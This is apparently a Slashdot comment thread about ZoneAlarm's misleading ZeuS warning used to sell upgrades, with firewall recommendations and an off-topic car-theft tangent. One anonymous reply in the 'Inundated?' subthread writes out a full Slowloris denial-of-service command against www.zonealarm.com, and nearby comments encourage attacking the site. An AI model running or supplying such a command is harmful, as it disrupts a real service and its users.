ZoneAlarm Employs Scare Tactics Against Its Users

snydeq writes "Check Point Software appears to be ripping a page from the 'scum it claims to fight,' running a scare-tactic warning dialog to frighten users into upgrading to a paid version of the company's ZoneAlarm firewall product. Preying on fears of ZeuS.Zbot, the Check Point warning dialog tells users their PCs 'may be in danger' without having found ZeuS.Zbot, nor having checked to see whether you're running an antivirus product. 'The program doesn't care if you're infected with ZeuS.Zbot, or if you have protection in place. It just wants to sell you an upgrade to the firewall that may or may not detect future ZeuS.Zbot variants' activities — some day.' Check Point's customers have inundated the ZoneAlarm forums with complaints."

ZoneAlarm still exists?

[Khyber]

I haven't used that piece of garbage software in about 5 years.

Re:ZoneAlarm still exists?

Same here. It use to be awesome, then got more and more bloated and slow.

Re:ZoneAlarm still exists?

I haven't used it since XP SP2 included a firewall. Good riddance!

Re:ZoneAlarm still exists?

[jlechem]

I long since moved to Spybot Search and Destory. That thing was ass even back then, it would slow down my old pentium to an unusable state. Doesn't sounds like they've gotten better in the past 5 years.

Re:ZoneAlarm still exists?

[MonsterTrimble]

That was my first thought. I quit using Zone Alarm before I jumped ship to Windows due to it *REALLY* borking windows until it was removed. Frankly, when the window's stock firewall kicks your ass, you're done.

Re:ZoneAlarm still exists?

[mark72005]

Is there a (preferably free) alternative to Zone Alarm?

I installed this several years ago on my parents computer because they kept getting it inundated with viruses and spyware and such.

Re:ZoneAlarm still exists?

Windows Firewall?

Re:ZoneAlarm still exists?

AVG is apparently pretty good. Combine with Spybot S&D.

Re:ZoneAlarm still exists?

Comodo free firewall has served well enough for a couple of years now.

Re:ZoneAlarm still exists?

[Khyber]

Windows 7 has been rock solid for me, surprisingly.

But I always have a spare MenuetOS USB key for when I want to tinker around.

Re:ZoneAlarm still exists?

[Lumpy]

Yes; windows XP SP2 or higher, windows Vista, and Windows 7. All three have a firewall that is more than most users need.

IF you really need a "little snitch" type of app for windows, you need advanced software. 99% of all users do not need this kind of "firewall" and would be better off with the built in windows one.

Re:ZoneAlarm still exists?

Wasn't that when they dropped free updates for w98?

Why yes, it was.
-"Check Point will cease to support Windows 98/98SE/Me with the introduction of our version 6.5 ZoneAlarm"
-"6.5.700.000 was released to the public on June 5, 2006"

Re:ZoneAlarm still exists?

Actually the best free kit I have seen so far is comodo firewall and antivirus. Good bit of kit but defence plus will give any non-savvy computer users a headache.

Re:ZoneAlarm still exists?

[magnusrex1280]

Microsoft Security Essentials, hands-down. Faster and more efficient than all the others, and it's unobtrusive. And it's free.

Re:ZoneAlarm still exists?

[HermMunster]

Zone Alarm is freaking annoying, constantly asking you to upgrade to the full version.

AVG is annoying too. They constantly warn you that if you don't get the paid version that you won't be fully protected.

Comodo is a pretty decent firewall and it has the side benefit of staying out of the way. I generally only see it when it asks me if I want the latest upgrade.

Microsoft's Security Essentials is fine for those individuals that need protection. If you get infected (with just about any malware protection) you won't be able to remove it with those products. You need a cadre of products and your best off cleaning it using a different computer with the drive set as a secondary drive non-boot.

Re:ZoneAlarm still exists?

[HermMunster]

I would dispute the "faster" part of your statement, though I would say that it is competent.

Re:ZoneAlarm still exists?

[h4rr4r]

iptables.

Re:ZoneAlarm still exists?

[Thinboy00]

If a system is so borked you're mounting it via another computer, you might be better off just formatting and reinstalling.

Re:ZoneAlarm still exists?

[Cley+Faye]

Even the windows firewall can get advanced rules, as in, more in-depth than "allow this application to do anything". It's just not the first dialog displayed when you open the settings in the control panel.

Re:ZoneAlarm still exists?

[WaroDaBeast]

I think I used it until version 5.5, and stopped afterwards because subsequent versions would prevent explorer.exe to load at all. I had to kill the process for things to work properly. Gave whichever version was the latest a try when I got a new computer in '07 — same story. *shakes head*

Re:ZoneAlarm still exists?

[billcopc]

Anything, really. Windows' built-in firewall does the job for most people. Beyond that, the only option worth considering is a firewall that is completely outside of your desktop PC, e.g. a residential router or small linux box with IPtables. Think of it this way: if your desktop gets a virus/rootkit, any software running on the same machine is also compromised, including the firewall.

Re:ZoneAlarm still exists?

[SenFo]

Combine the built in firewall with Microsoft Security Essentials and keep with Windows updates and you'll generally have a secure system.

Re:ZoneAlarm still exists?

[cheater512]

"Use this Microsoft software and then your Windows computer will be secure."

Yes I know they work reasonably well, but man does that make me cringe. :p

Re:ZoneAlarm still exists?

[Snaller]

Its odd, it worked fine for me on Xp - but then when i went over to Windows 7 it ended up blocking all connections (including itself (if you click update, it should be able to check for updates, but it just froze itself)) - and there was nobody who knew why.

So out it went.

Re:ZoneAlarm still exists?

[hairyfeet]

Yes, and it is damned good and low resource too. I would highly recommend Comodo Firewall which is free and you can either get it alone, on as part of their also free Comodo Internet Security (same link). I have been using Comodo for quite awhile, as well as giving it to customers and family, and it really is top notch. It supports stealthing your ports, it supports whitelisting of local LANs if you desire, and most importantly while it gives you the tools to set up a seriously deep policy, you can just leave it at the defaults and it works great as well. And it works on everything from XP32- windows 7 x64.

So give it a try, they have a whole line of killer free tools including Comodo Time Machine and a nice webkit based browser called Comodo Dragon. They even have free SSL certs for website owners. A great company with some great tools that cost $0, oh and NO nagware, NO email address required, NO limited updates, and their Internet Security has an excellent sandbox built in that by default puts all unknowns in the sandbox.

Re:ZoneAlarm still exists?

+1

Re:ZoneAlarm still exists?

[vegiVamp]

"Search and Destory", eh ? I guess Slashdot is running that, too.

Re:ZoneAlarm still exists?

Microsoft Security Essentials, hands-down. Faster and more efficient than all the others, and it's unobtrusive. And it's free.

Yes... Except sometimes when you want to run a 1.2GB .exe installer.

Microsoft Security Essentials causes your entire system to grind to a halt and cause explorer to crash. It must be running in-thread blocking extractor/scanner. Aside from that, it is very reasonable setup.

Re:ZoneAlarm still exists?

[riT-k0MA]

I found Comodo to be to advanced for the average Luser.
I love it, though.

Re:ZoneAlarm still exists?

[Odinlake]

Meh, stupid people don't deserve to have money anyway.

Then on the other hand neither does ZoneAlarm.

Re:ZoneAlarm still exists?

The inbuilt Windows firewall misses the one key feature of Zone Alarm that makes it worth keeping. It does not alert you when a program is attempting to make an outbound connection.

This wonderful feature of Zone Alarm has allowed me to detect and remove more malware from peoples machines than anyhing else (including Anti Virus software) It's also the reason that I still run Windows and haven't switched to Linux as Linux does not have anything similar.

Most firewalls are crap as they only block incomiong connections whilst allow anything on the local machine to connect to the internet. It should be down to the user to decide what gets internet access (especially with the advent of all these retarded Windows programs which want to keep trying to auto update)

Zone Alarm is the only program that allows a user to decide what gets internet access and for that reason alone it is invaluable. This latest stunt is cretinous but that doesn't alter the fact that it's a good bit of software.

Re:ZoneAlarm still exists?

I installed this several years ago on my parents computer because they kept getting it inundated with viruses and spyware and such.

Don't let them run as Administrator, or an account that is Administrator-equivalent.

Re:ZoneAlarm still exists?

[Rogerborg]

You're using Windows, and sneering at Lusers? That's like a dwarf taunting midgets.

Re:ZoneAlarm still exists?

[Machtyn]

Comodo Internet Security. Their firewall is top notch. Their AV is as good as the others. I haven't really put it to the test, other than I know my computer has been clean for years.

Re:ZoneAlarm still exists?

[Ihmhi]

Supplement with MalwareByte's Anti-Malware.

Re:ZoneAlarm still exists?

[Jaseoldboss]

I came across a great illustration of why you need a good firewall that can be used to control outbound traffic the other day. I was installing CPUID and the installer tried to contact Ask.com before it had even asked me whether I wanted the Ask toolbar installed or not.

Windows firewall would have just let that through but I was using the Sphinx Software firewall app that configures Windows Firewall so that you can use it to stop unauthorised outbound traffic.

Re:ZoneAlarm still exists?

[ultranova]

It use to be awesome, then got more and more bloated and slow.

ZoneAlarm was never awesome. It worked for TCP, but choked on UDP. The whole machine slowed to a crawl if you tried using an UDP-heavy application with ZoneAlarm active.

Re:ZoneAlarm still exists?

[Lotharus]

It's also the reason that I still run Windows and haven't switched to Linux as Linux does not have anything similar.

Umm.. probably because it's not really necessary on Linux. I'm not suggesting that there is NO Linux malware out there, but it's certainly significantly less proliferate than Windows malware (in large part because of market share...a great Linux virus simply won't damage as many computers).

Also, though it's not uncommon to configure iptables (the default firewall in most modern Linux systems (?) ) to mindlessly allow outbound traffic, it's certainly possible to configure it to disallow locally-originated outbound connections.

It's also possible to configure it to log all sorts of useful information about packets, such as what process originated them and where they're headed. Then any of a myriad of open-source tools can be used to analyze said logs for unscrupulous behavior.

And iptables will never try to get you to upgrade to a for-pay version with stupid hand-waving scare tactics like these.

Re:ZoneAlarm still exists?

but man does that make me cringe

Mainly because you're an asshat.

Re:ZoneAlarm still exists?

XP release version had a firewall, it just wasn't on by default.

Re:ZoneAlarm still exists?

[Jaseoldboss]

Now that I'm home I can back up my claim about Ask spying on you before you've even installed it!

Pic

Re:ZoneAlarm still exists?

[Lord+of+Hyphens]

I see your iptables and raise you pf, because my god iptables is cryptic.

Re:ZoneAlarm still exists?

[asecure]

pretty sure all 3rd party desktop firewall warn you for both in coming and outgoing connections. i know comodo does and so did sygate before they were bought over.

Re:ZoneAlarm still exists?

[riT-k0MA]

*nix fails to play most games.
If I found another OS with 100% compatibility for games, I'd completely switch. For now I have to use Windoze for my main PC and linux for everything else.

Re:ZoneAlarm still exists?

[Reziac]

What uses UDP? and what version(s) of ZA? Asking cuz on this machine that does all my internet everything, I have ZoneAlarm-ancient (v2.1.something) and have not noticed any such problem. -- My policy has always been to use the simplest version that works, and in this case.. this is it.

See ya ZA

[rbochan]

I used to recommend them to residential users. I will not ever again.

Re:See ya ZA

[Mashiki]

I think that was the idea behind this. Or "How to lose your customers in 3 easy steps."

Re:See ya ZA

[Martin+Blank]

I stopped recommending ZA a few years back, when they had that stream of critical vulnerabilities. Only recently had I thought about adding them back into the recommendations list since I hadn't seen many major problems in a while. This knocks them back off the list for a couple more years at least.

Re:See ya ZA

[Machtyn]

See above comments for Comodo's firewall. Apparently, Microsoft's built in version does the trick, too.

Trusted

[Psychotria]

Well, they fooled me at first because I've had ZoneAlarm installed for ages and trusted it. After looking through my running processes, registry, etc, and doing a virus scan I suspected something was dodgy because there was no indication of this zeus trojan. It was then I found the big list of complaints on ZoneAlarm's forums. I was a bit annoyed that they wasted my time. Until yesterday when this showed up I had no reason no to trust what ZoneAlarm was telling me. Now, I am not so sure.

Re:Trusted

[waddgodd]

Why are you paying attention to your firewall for virus alerts? Do you do the same for your word processor? It makes about as much sense.

Re:Trusted

[Darkness404]

....Because many viruses will try to open up ports so they can send spam, etc.

Re:Trusted

[kodr]

Time to switch to Comodo Internet Security then.

Re:Trusted

When I got a drive-by download of the usual TrustMeI'mTotallyAnAntiVirusProgram 2010, my firewall caught it trying to phone home. My anti-virus didn't even get a chance to alert me because I got to work exorcising my computer immediately after blocking its outbound connection.

I've since moved to an OS where I don't have to jump through hoops to make sure I'm not running as Admin all the time. Before you jump to any conclusions, I mean Windows 7, though I do run Linux on my media PC.

Re:Trusted

[0racle]

I hope their security suite is better then their backup tool. Did a test restore with their trial and it was unusable, permissions were all messed up and it was missing a lot of files.

I personally won't recommend any of their products.

Re:Trusted

[CannonballHead]

Your AV doesn't check your e-mail/downloads automatically?

Re:Trusted

Why are you paying attention to your firewall for virus alerts? Do you do the same for your word processor? It makes about as much sense.

That is a superb demonstration, by a reader of Slashdot no less, of the ignorance that allows viruses, botnets, and spam to be as prolific as they are.

I'm going to use that quote "Why are you paying attention to your firewall for virus alerts?" in my next presentation.

Re:Trusted

[edxwelch]

I tried it. Their firewall seems to only block a small percentage of outgoing connections.

Re:Trusted

[laron]

In the last months, I see more and more malware that does not even require admin permissions. On the plus side, it is of course much easier to clean up an infected user account.

Re:Trusted

[TheThiefMaster]

I've since moved to an OS where I don't have to jump through hoops to make sure I'm not running as Admin all the time. Before you jump to any conclusions, I mean Windows 7, though I do run Linux on my media PC.

Jump through hoops?

Windows 7 with an admin account with UAC enabled (default) = Linux with a limited user with sudo permission
Windows 7 with a limited user = Linux with a limited user

If you run as a limited user on 7 then the UAC prompts become admin login prompts, so it's not too hard to actually run as a limited user and still be able to do adminy things if you want. There's not a lot of point though, you might as well just use your admin account, UAC'll make it act as a limited account.

Re:Trusted

[bigrockpeltr]

he said he moved to win 7 not from it.

Re:Trusted

[TheThiefMaster]

So he did.

That'll teach me to read slashdot early in the morning...

Re:Trusted

[kodr]

Yes, CIS is definitely better. I used it since 3, but it wasn't really user friendly. They added AV, sandbox and improved the HIPS, you should try it. LanGuy99 did some tests on Youtube, take a look at them. http://www.youtube.com/watch?v=-sN7ISKNeGM

Re:Trusted

[kodr]

You can change how much the firewall nags you, they tried to make it user friendly as much as possible without sacrificing security. With CIS5, they added an AV, sandbox and HIPS (which is better than the one in CIS 3).

ZoneAlarm was backdoored, right?

[equex]

I thought ZoneAlarm got outed for essentially being a backdoor some years ago ? I stopped using it then and never looked back.

Re:ZoneAlarm was backdoored, right?

[TheRealMindChild]

Trusting a software firewall is like trusting "The Club (tm)" to protect your car from thieves. Just like ZoneAlarm, once I hit it, I'm hitting the software stack on your machine, and a compromise via 0-day exploit can be made just the same as a car thief using a hacksaw to cut a small hole in your steering wheel and removing "The Club (tm)"

Re:ZoneAlarm was backdoored, right?

[FuckingNickName]

And how many such network stack attacks have existed since Win98?

Re:ZoneAlarm was backdoored, right?

[TheRealMindChild]

It doesn't need to be the network stack exploited... just ZoneAlarm... the bit you shoehorned between your network connection and the rest of the internet.

Re:ZoneAlarm was backdoored, right?

[Caerdwyn]

CVE-2007-0069

CVE-2007-0069

CVE-2010-1893

Though the last one really doesn't count for ZoneAlarm's intended function, as it's a local privilege escalation.

Reference: http://cve.mitre.org/index.html
Search terms: Windows kernel tcp/ip

Re:ZoneAlarm was backdoored, right?

[Caerdwyn]

fatfingered the first. CVE-2007-0066

Re:ZoneAlarm was backdoored, right?

And all of those are easily prevented with the default settings of the Windows built-in firewall. Just stop turning it off and you are fine.

Re:ZoneAlarm was backdoored, right?

No, no no no no. "The Club" you want is the one with members, one of whom comes round once a month to collect on a little "insurance" to keep you car from being stolen :)

Re:ZoneAlarm was backdoored, right?

[jgtg32a]

By fat fingered you mean had your mind in the gutter

Re:ZoneAlarm was backdoored, right?

[Lumpy]

What loser thief uses a "hack saw" for that? bolt cutters will go through a steering wheel in less than a second. that kind of speed is important for a car thief. Sawing for 10 minutes is not something anything but a crackhead would do.

Re:ZoneAlarm was backdoored, right?

[Martin+Blank]

Hacksaw blades with duct tape around one end are much easier to hide than bolt cutters, and it only takes under a minute to go through a steering wheel.

Re:ZoneAlarm was backdoored, right?

[PaladinAlpha]

My car got stolen a week ago, so I'm really getting a kick out of this. (No, it really did get stolen.)

Related note. Let's say you lived in a high-risk zone for car thievery, and that you weren't going to be able to afford anything more than like some late 90's economy model car (so, say, no car alarm or GPS), and you really HAD to make sure it didn't get stolen. What would you do? I was actually thinking Club until you people convinced me otherwise *grin* -- any alternate suggestions?

Re:ZoneAlarm was backdoored, right?

[FuckingNickName]

Poorly implemented management protocols sitting above TCP, UDP or raw IP do not represent the kind of problem which a software firewall cannot deal with because of a bug in the network stack.

N.B. router discovery protocol is not enabled by default in Windows and IGMP will be blocked by default on any sane firewall before packets are acted upon. This is fortunate since several operating systems, including Linux, have suffered from poorly implemented IGMP handling.

Re:ZoneAlarm was backdoored, right?

[Tanktalus]

Googling for "car colour theft", one of the top hits is an article suggesting painting your car pink. Not sure if the cure is worse than the disease, but that's your call to make for your own situation.

Re:ZoneAlarm was backdoored, right?

[SydShamino]

The Club works fine provided the car next to yours doesn't have one. It's not about making your car steal proof - it's about making your car slightly-less steal-able than your neighbors'.

Same strategy that makes a barking dog good home security.

You won't get absolute security to prevent losing your car. You could put in an ignition kill switch, but you'd want to find a mechanic that was creative with switch placement or that would be found, too. And the thief won't know about this until after he's broken your window, at which point he'll steal your stereo, slash up your dashboard and piss in your seat out of spite.

My usual car is high-end, but I have a 1997 Mazda Miata that I use when I plan to go downtown at night. I can park it on the street and most people won't bother it. The worst that's ever happened was a homeless guy ripping out the side mirror's motor assembly. (And that was hassle to replace, but just $100 from a junkyard.) The top is cloth - anyone who wants into it can get into it - so I just leave the top down most places. (Where homeless congregate I put it up to avoid someone pissing in it.)

Re:ZoneAlarm was backdoored, right?

[SydShamino]

Also, don't leave anything in your car, and don't put things in the trunk when you park. Why advertise that you just stuck a laptop in the trunk and then walked into a movie theater? If you're going to put something in the trunk, do it before you drive somewhere, not after you arrive.

Re:ZoneAlarm was backdoored, right?

The Club is perfect for when you don't want to carry a pry bar around and there is almost always a car with one around.

Smash the window, saw the wheel, 5 minutes later you're ready to jack the car your really want.

Poor bastard has a busted window and floppy steering wheel, but at least he still has his car, so the Club sort of works.

Re:ZoneAlarm was backdoored, right?

[Caerdwyn]

I thought that was part of the axioms and was "taken as read"...

What are you wearing?

Re:ZoneAlarm was backdoored, right?

[MachDelta]

Wire a toggle switch to your fuel pump +12v wire and hide it somewhere in the cabin. Preferably not any place it will be bumped/kicked/elbowed. Then get in the habit of switching it off when you get out. Next time some moron tries to jack your ride, all they'll be able to do is kill the battery.

Re:ZoneAlarm was backdoored, right?

[SydShamino]

If you're carrying something to smash the window and a saw to cut the wheel, why aren't you already carrying a pry bar, too?

Why would you even need a pry bar? To get into the car? Already have something to that. To pop the ignition? Already have something for that, and even if you couldn't do this with a saw (but could with a prybar) how would a rounded-on-all-ends Club help?

Re:ZoneAlarm was backdoored, right?

[toddestan]

Get a manual transmission. Then remove the radio and let the wires dangle out of the dash. Absolutely don't leave anything visible in the car that might be worth stealing. That includes the $1.27 in change in the cup holders. It may even help to empty out the glove box and leave that open too. It may also help to get a less common model of car, as it's the most common cars that are the most desirable as it's easier to fence the parts. Also don't get a higher trim line, because once again the parts are more valuable, especially to the boy-racer types who like to try to make their low-end car look like a higher-end model.

Re:ZoneAlarm was backdoored, right?

Wheel lock

Re:ZoneAlarm was backdoored, right?

[PaladinAlpha]

Excellent advice, and I now have, I feel, a better grasp of the situation. Thanks :D

Re:ZoneAlarm was backdoored, right?

[Eivind]

Paint it. Pink with purple stripes, works well, or any other colorscheme far away from metallic-grey. Seriously, it's cheap. It's effective. It makes it a hell of a lot easier to refind your car on the giant parking-lot, and it's zero overhead in your normal daily routine.

Re:ZoneAlarm was backdoored, right?

[hairyfeet]

Forget econo car, those tend to get stolen for parts. think small pickup, like an S10. Decent on gas, a mid 90s work truck is common as dirt, therefor not worth shit parts wise, thieves don't seem to care for old work trucks, especially if it is the common company white with a few dents in it, and if you have the bed open and a stock stereo any thief can take one look and see there is nothing to steal.

Trust the feet, I used to live in a high car theft part of town, and while my neighbors were all the time moaning because they lost a vehicle, nobody ever bothered to steal my 92 beat up company white King Cab.

Re:ZoneAlarm was backdoored, right?

[Lumpy]

Easiest is to wire in a switch to cut power to the fuel pump.

Defeats ALL car thieves except for the ones with flatbed trucks.

Re:ZoneAlarm was backdoored, right?

[Lumpy]

buddy of mine did this.. made the car look "already robbed".

he could park where all cars get stolen and it would not be touched.

Backfire after management change

[flydpnkrtn]

As a poster indicates, ZA was bought out by CheckPoint a few months ago. This scare tactic will probably backfire on them...

Why in the hell did someone at CheckPoint say to themselves "Wait a second... Gestapo style marketing that looks like a phishing scam sounds like a great idea!"

Re:Backfire after management change

[ponds]

2004 is more than 'a few months ago'

Re:Backfire after management change

Why in the hell did someone at CheckPoint say to themselves "Wait a second... Gestapo style marketing that looks like a phishing scam sounds like a great idea!"

Because it obviously works...

Re:Backfire after management change

Why in the hell did someone at CheckPoint say to themselves "Wait a second... Gestapo style marketing that looks like a phishing scam sounds like a great idea!"

Because people who get whatever some popup tells them they need are clearly the ones most in need of the higher levels of "protection" offered by the Pro version.

Re:Backfire after management change

[jopsen]

This scare tactic will probably backfire on them...

Wouldn't that require that their customers knowns the difference between, the ZoneAlarm popup and one of the five other popups provided Symantec, AVG free and Avast... All of which are likely installed and peacefully generating popups at appropriate intervals...
- Seriously, how many tech savvy users runs Windows, sorry I mean... How many tech savvy users runs anti virus software... let alone ZoneAlarm... :)

Re:Backfire after management change

[flydpnkrtn]

What's a measly 72 months between friends? :)

Re:Backfire after management change

[couchslug]

"This scare tactic will probably backfire on them..."

Easy enough to help that happen.

Geeks are often asked for advice. Telling people software will fuck up their computer tends to get their attention.

Re:Backfire after management change

[Spad]

Any tech savvy user should be running AV on Windows - and that's not a slight on Windows per se - given the number of vulnerabilities in a wide range of software *cough*Adobe*cough*, exploitable in the browser from "trusted" sites that have been compromised, often with days or weeks without a patch or workaround, it's a very bad idea not to run some form of real-time AV scanner.

The days of "I know what I'm doing, I keep my stuff up-to-date, I don't open unknown attachments, boot from unknown media or visit dodgy sites" are sadly long gone.

Re:Backfire after management change

[Machtyn]

To add to this, because any tech savvy user is also likely testing out new sites, software, etc... any of which may be vulnerable or a virus.

Inundated?

Really? 30 posts in a thread is "inundating" someone? Really, do they have only 40 users and this is more than half ... ?

Let's scale the hyperbole down from "the elder gods rise" and back down to "a few people are mildly concerned".

Re:Inundated?

[flydpnkrtn]

There are posts that reference other threads where this was "already posted," but clicking those links leads you to a vBulletin "No thread specified" page. Presumably ZA has been deleting threads....

See http://forums.zonealarm.com/showpost.php?p=283423 and http://forums.zonealarm.com/showpost.php?p=283420 for example posts... both those posts reference a nonexistent thread.

Damage control maybe?

Re:Inundated?

[ElKry]

Feels like thread merging to me.

Re:Inundated?

[lgftsa]

They're also editing people's posts under their "terms of use" policy. Mostly it's removing the names of other firewall products, but there's a couple by the main editor "GeorgeV" with no indication of why the edit was made or any placemarker to show where it was made.

Ah, and there's also some posts which have entirely disappeared. Since the unique post ID is common to the entire forum it's hard to detect, and the #x post counter on the right is dynamically generated when the thread is displayed. I did see one post disappear, and then the user re-posted. Here's the details of the new post, which I expect to disappear as well.

http://forums.zonealarm.com/showpost.php?p=283543&postcount=40

Unread Today, 01:24 PM
MajorSanchez MajorSanchez is online now
Junior Member

Join Date: Sep 2010
Posts: 1
Default Re: zbot.zeus Notice
Trolling? Barely. Check Point software needs the wrath of the internet unleashed upon them to make them realize their mistakes.

[redacted] attacks make ZoneAlarm.com go down.

[redacted]

et cetera.
Reply With Quote

Attack command redacted because I'm nice

Whoops, that post's gone, too.

Way to go Checkpoint, with one twitch of your marketing neuron you've alienated your loyal users and enraged the script kiddies.

Re:Inundated?

Slowloris ./slowloris.pl -dns www.zonealarm.com -num 1700 -timeout 10 -tcpto 5

Re:Inundated?

No, they've been censoring and removing posts like mad. I bitched at them and *poof* my post was gone. They've removed dozens, and if you mention a competing product they censor it or delete the post. Way to go, guys! Nothing like running scared to show your customers your true colors!

Re:Inundated?

[fbjon]

As I understand it, this popup is to get people to upgrade to a paid version. In other words, those who get the popup haven't paid, and are thus not actually customers. That's what I imagine the company must be thinking, if they are as stupid as I think they must be.

Summary is correct

[cerberusss]

The summary is spot on. I haven't been a Windows user for a number of years, but a friend asked me to fix her malware problem and I reinstalled her Windows XP box. For the firewall, I remembered ZoneAlarm from a few years ago and installed it. After the first reboot, some stupid popup appeared, prompting me to "like" the software on Facebook. I'm like WTF? But still gave them the benefit of the doubt. Next reboot it comes up with the totally bogus popup that I may get infected with Zeus. I had to reread it twice to find out it really was an advertisement.

I downloaded Comodo, unplugged the network, uninstalled ZoneAlarm, installed Comodo and plugged back into the inter webs. Never looked back.

I probably will not buy any Check Point software for my business either.

Re:Summary is correct

[Blue+Stone]

Yeah, I ditched Zone Alarm for Comodo some time ago after ZA got bought out by Checkpoint. I think it was that the newer post-buy-out versions of the software kept re-ckecking the "automatic updates" option in the preferences and kept giving itself permission to access the internet, despite me explicitly blocking it. Several instances of this and I thought, 'crikey, the new owners are a bit dodgy' and jumped ship to Comodo.

Can't say I'm surprised to see them plumet down the 'sacrifice integrity to serve our bottom line' route. (That's also why I ditched AVG).

Re:Summary is correct

[Martin+Blank]

Checkpoint isn't bad, actually. It's just the ZA line that you really need to avoid. Checkpoint itself does well if you don't need advanced features (at least with high performance).

Re:Summary is correct

[Tim+C]

After the first reboot, some stupid popup appeared, prompting me to "like" the software on Facebook.

See, that's the point at which I would have sought an alternative. If the vendor is dumb enough to put that in their product (and a security product too), I really would be wondering what the fuck else they had put in there.

Re:Summary is correct

[Jason+Levine]

I have ZoneAlarm installed on my home PCs and, after updating to the latest version, would notice a "Do you want to upgrade to the paid version" dialog box on every boot. I was annoyed, but decided to give ZA the benefit of the doubt since I've used them for years. With this "virus warning" pop-up (intentionally looking like a "you're infected" pop-up), though, they've lost me. As soon as I can, I'm uninstalling ZA and will install Comodo instead. Thanks for the years of great use, ZoneAlarm. It's a shame you ruined it all in a bad attempt to upsell!

Re:Summary is correct

[cerberusss]

As soon as I can, I'm uninstalling ZA and will install Comodo instead.

It's really easy:

1. Download Comodo
2. Unplug network cable
3. Uninstall ZoneAlarm
4. Reboot
5. Install Comodo
6. Connect network cable

Will take you all of five minutes.

Whats ZoneAlarm?

[NevarMore]

Is it like a frontend for iptables?

Re:Whats ZoneAlarm?

[master0ne]

It used to be a sophisticated light weight feature rich firewall for windows.... it allowed rules and whatnot.... now... its a bloated flaming pile of sh*t sinking with a horrible company that deserves to be put out of business for its questionable marketing practices and horrible customer support.

Re:Whats ZoneAlarm?

[youn]

I thought it was more like a rear end as it's acting like an ass ;)

ZoneAlarm users get what they deserve

[realmolo]

Seriously. What morons are using ZoneAlarm? WHY would you use it, when Windows has had a better firewall since XP, and the Vista/Windows 7 firewall is even better than that?

ZoneAlarm has always been a piece-of-shit.

Re:ZoneAlarm users get what they deserve

[Nimey]

Not always. It was pretty decent back in the 2.x Windows 98 days.

Re:ZoneAlarm users get what they deserve

[Culture20]

Windows has had a better firewall since XP

Try blocking outgoing connections with the XP firewall.

the Vista/Windows 7 firewall is even better than that

This is true. Unfortunately, with its power has come a more difficult interface. Why do I have to click 20 times to enter ~10 IP ranges into the scope list for just one port? Why can't it be a comma delimited text field like before?

Re:ZoneAlarm users get what they deserve

[Beerdood]

Seriously. What morons are using ZoneAlarm?

The same people that never remove any programs from their desktop and agree to anything any pop up tells them to. (Oh I have to update? Ok, I'll just click yes - it must be helpful!) When your non-computer-savvy friends call you for "tech support" and you start up their computer to find out why it's running so slow - it doesn't surprise me to see all sorts of useless or ancient programs running in the background.

That's pretty much who zone alarm is after. The non-techie crowd that still happens to have their software installed that can be easily fooled into thinking they have a virus.

Re:ZoneAlarm users get what they deserve

[mysidia]

Try blocking outgoing connections with the XP firewall.

Try upgrading to Windows 7 and using Windows Advanced Firewall instead of a 12-year-old product ? :)

Worrying about blocking outgoing connections with ye' ol' windows XP firewall is kind of like worrying about duplex printing on a 80s/early 90s-era dot matrix printer <G>

Re:ZoneAlarm users get what they deserve

[JayGuerette]

WHY would you use it, when Windows has had a better firewall since XP, and the Vista/Windows 7 firewall is even better than that?

Why? Simple: because the Windows firewalls have a built-in white-list. That completely removes it from my consideration. I'd argue that 'firewall' is not even applicable to that service.

Re:ZoneAlarm users get what they deserve

[e065c8515d206cb0e190]

Windows XP is a 12 year old product?

Also, how is age relevant? ipchains/iptables is 12 years old, and supports this very basic functionality.

Re:ZoneAlarm users get what they deserve

[Culture20]

Um, yeah. That was my point. Realmolo said XP firewall was better than ZA. I explained why it isn't, and even pointed out that Win7's was better.

Re:ZoneAlarm users get what they deserve

Except iptables doesn't get upgraded when Linux Vista and Linux 7 comes out you retard. XP is obsolete and the improved firewall is in 7. As opposed to iptables that gets upgraded from your kernel and gets regular userspace updates that do not require an OS switch.

Re:ZoneAlarm users get what they deserve

No kidding, it's a solution for people running a 12 year old product that's still supported by its vendor. Some people don't like dropping a hundred bucks when they have supported, functional software already. Apparently a Smug license comes with every new copy of windows these days.

Re:ZoneAlarm users get what they deserve

zonealarm was pretty awesome back in the day. atguard was even better, but it disappeared. atguard had the firewall stuff, but also this thing where you could tell it what ads and javascript to remove from what web pages. Oh man, it's all coming back.. anyone remember thirdvoice? It let you type "Lies! They suck!" on web sites and anyone else using thirdvoice could see them. :D

Re:ZoneAlarm users get what they deserve

[MMC+Monster]

Seriously. What morons are using ZoneAlarm?

You know that person you told to use Zone Alarm 8 years ago? He's been upgrading since then and telling all his friends that his computer expert friend told him Zone Alarm is great.

Sucks to be us.

Re:ZoneAlarm users get what they deserve

[mysidia]

Linux 2.2 wasn't released until 1999. 12 years ago, we were using a tool you probably never heard of called ipfwadm, and before that ipfw

Linux's firewalling capabilities have always been miles ahead of Windows' built-in firewall capabilities in terms of being functional, flexible, and easier to get to do what you want for the power user.

Windows, ZA, Comodo used to be ahead in terms of usability for the average user.

Linux firewalling capabilities improved a bit over time, they became more powerful and more user friendly (at least for the Linux admin), more capabilities were introduced in the form of modules.

However, Linux firewalling didn't change much --- it's pretty hard for something that is already nearly perfect to evolve.

On the other hand Windows had and still has a lot of ground to cover in regards to improving the firewall.

It is more cumbersome than ever to add firewall rules or exceptions to the Windows firewall. No simple text-based language. No built in rapid CLI-based addition method (have to resort to still a cumbersome GUI to do it).

Re:ZoneAlarm users get what they deserve

[mysidia]

ugh.. my comment two down is meant to be the reply to this.

12 years ago, it was not ipchains, it was something even older :)

Re:ZoneAlarm users get what they deserve

And that whitelist is completely editable (in Vista and 7, at least).

Re:ZoneAlarm users get what they deserve

[camperslo]

>Windows XP is a 12 year old product?

To avoid interoperability issues between planets and provide protection against unexpected centuries, highly innovative operating systems offer chronometric algorithms based on user-derived hair plus root extraction data. Perhaps you forgot to enable this feature.

Re:ZoneAlarm users get what they deserve

[psoriac]

Have you actually tried to enable outbound filtering on a home PC? It's terrible.

Re:ZoneAlarm users get what they deserve

[e065c8515d206cb0e190]

Wikipedia mentions a pre-version in 1998.

What matters is that age is not an excuse for a lack of feature. The firewall in windows sucked and still has a long way to go to match what a linux user had 12 years ago.

Re:ZoneAlarm users get what they deserve

Try upgrading to Windows 7 and using Windows Advanced Firewall instead of a 12-year-old product ? :)

